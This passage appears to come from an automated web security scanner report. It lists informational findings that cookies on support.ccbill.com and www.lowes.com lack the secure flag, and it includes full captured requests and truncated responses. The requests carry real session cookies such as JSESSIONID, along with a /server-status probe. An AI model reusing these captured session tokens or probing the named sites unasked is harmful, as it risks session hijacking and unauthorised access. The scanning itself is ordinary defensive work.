Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:19 GMT
Last-Modified: Wed, 08 Sep 2010 19:05:55 GMT
ETag: "286bc1-3cf4-48fc433f68ac0"
Accept-Ranges: bytes
Content-Length: 15604
X-Cnection: close
Content-Type: text/css
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

/* Lavidge Base HTML/CSS - Written By: Eric Florez - Last Updated: 2010-07-06 */
/* ====================== Page Formatting ======================== */
* {
   margin:0;
   padding:0;
   font-family:Verd
...[SNIP]...

7.99. https://support.ccbill.com/style/css/consumers.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/css/consumers.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/consumers.css HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:17 GMT
Last-Modified: Wed, 08 Sep 2010 20:06:02 GMT
ETag: "33a641-1180-48fc50af4fe80"
Accept-Ranges: bytes
Content-Length: 4480
X-Cnection: close
Content-Type: text/css
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

@import url(base.css);
/* ====================== Page Formatting ======================== */
ul.list_arrow li, #left_nav li.current_page {background-image:url(../img/icons/bullet_arrow_light_blue.gif)
...[SNIP]...

7.100. https://support.ccbill.com/style/img/background/body.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/background/body.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/background/body.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT
ETag: "2cea04-11b-48fc418aa0440"
Accept-Ranges: bytes
Content-Length: 283
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR.......h......G.....-PLTE.............................................e.".....IDATx^... .1.... 6.....mA...!...6..i...+H..`...............%..j..%].&..;^./.v.>= 9.........sP........b..
...[SNIP]...

7.101. https://support.ccbill.com/style/img/background/body_container.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/background/body_container.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/background/body_container.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT
ETag: "1674f1-362a-48fc418aa0440"
Accept-Ranges: bytes
Content-Length: 13866
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR...d.................PLTE...................................................................................................................................|...5dIDATx^...z#I.....F...{
...[SNIP]...

7.102. https://support.ccbill.com/style/img/background/main.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/background/main.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/background/main.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 18:58:17 GMT
ETag: "33a652-79d-48fc418aa0440"
Accept-Ranges: bytes
Content-Length: 1949
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR.......d.....".......PLTE...................................................................................................................................>.....IDATx^...n...@..90g*..
...[SNIP]...

7.103. https://support.ccbill.com/style/img/buttons/btn_search.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/buttons/btn_search.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/buttons/btn_search.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:22 GMT
Last-Modified: Wed, 08 Sep 2010 19:00:02 GMT
ETag: "2de9e6-b45-48fc41eec3080"
Accept-Ranges: bytes
Content-Length: 2885
Keep-Alive: timeout=60, max=60
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR...i...".....k.......tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

7.104. https://support.ccbill.com/style/img/icons/bullet_square_blk.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/icons/bullet_square_blk.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/icons/bullet_square_blk.gif HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:21 GMT
Last-Modified: Wed, 08 Sep 2010 19:01:46 GMT
ETag: "16756d-2e-48fc4251f1a80"
Accept-Ranges: bytes
Content-Length: 46
X-Cnection: close
Content-Type: image/gif
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

GIF89a.............!.......,.................;

7.105. https://support.ccbill.com/style/img/sprites/page_elements.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/sprites/page_elements.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/img/sprites/page_elements.png HTTP/1.1
Host: support.ccbill.com
Connection: keep-alive
Referer: https://support.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.5.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:23 GMT
Last-Modified: Wed, 08 Sep 2010 19:03:23 GMT
ETag: "13c85c-2b19-48fc42ae734c0"
Accept-Ranges: bytes
Content-Length: 11033
X-Cnection: close
Content-Type: image/png
Set-Cookie: TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

.PNG
.
...IHDR.."6...R.....Py......PLTE).....................................................<^..........................y.................................(........).........................UV....t
...[SNIP]...

7.106. https://www.lowes.com/server-status previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/server-status

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server-status HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; stop_mobi=yes; TS176ebc=1a0f9fe32c557afd221d80acddaf468367f2f8b0aad7ead04e1cbb8c; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}

Response

7.107. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/main.css HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 05 Jul 2011 17:15:57 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 238055
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/* Reset CSS */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td,button{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0}fieldset,img
...[SNIP]...

7.108. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; catSearchResult=|/pl_Flooring_4294934373_4294937087_; TSdcd8fd=42184ef523475358e3f266b98a3eff98b936a614cb0d4b614e1cbbd2; cmSessionDepth=4; lowes-prefs={"zipin":{"show":false},"tollfree":{"show":true}}; fsr.s={"v":1,"rid":"1310506289401_163212","ru":"http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0","r":"www.lowes.com","st":"","to":3,"c":"https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; JSESSIONID=0000bJcLADoQIGfUv01WZVkpsK7:14e1grfqa; BIGipServerproduction-asm-onlineA.lowes.com-tcp443=217583788.47873.0000; TS176ebc=5d8c447446fc2b8f4f060fa877256f5d55d9cb443b13e8794e1ce39e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jun 2011 11:20:33 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 60109
Expires: Wed, 13 Jul 2011 00:22:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 00:22:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

/*
* common.js
* Common javascript to be run on every page of the Lowes.com web site.
*
* Copyright Lowes, Inc.
*
* Last Modified On 03/04/2010
* Modified By R. Adams
*/

var lowes=
...[SNIP]...

7.109. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

akaau=1310518355~id=24041af9526315cfad1662ac5edcd35c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
